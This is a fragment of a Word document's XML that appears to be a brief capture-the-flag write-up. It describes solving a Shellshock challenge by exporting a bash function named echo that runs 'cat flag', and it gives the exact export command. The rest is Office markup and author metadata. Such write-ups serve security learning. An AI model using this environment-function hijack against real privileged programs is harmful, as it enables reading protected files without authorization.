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D420" w14:textId="3D695038" w:rsidR="00616510" w:rsidRDefault="00BF78DF">
      <w:r>
        <w:t>After looking at shellshock.c I figured I could simply export echo to cat flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3752E8" w14:textId="66E95832" w:rsidR="00BF78DF" w:rsidRDefault="00BF78DF">
      <w:r>
        <w:t>That’s it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9697B" w14:textId="443D0FF9" w:rsidR="00152EA3" w:rsidRDefault="00152EA3">
      <w:r w:rsidRPr="00152EA3">
        <w:t>export echo="() { cat flag; }"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00152E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42"/>
    <w:rsid w:val="00152EA3"/>
    <w:rsid w:val="00616510"/>
    <w:rsid w:val="007F32F6"/>
    <w:rsid w:val="00BF78DF"/>
    <w:rsid w:val="00EB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E5A0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{23961B2A-9138-4173-95DD-3F3D9F3E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עובדיה</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>יובל עובדיה</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-17T20:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-17T20:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>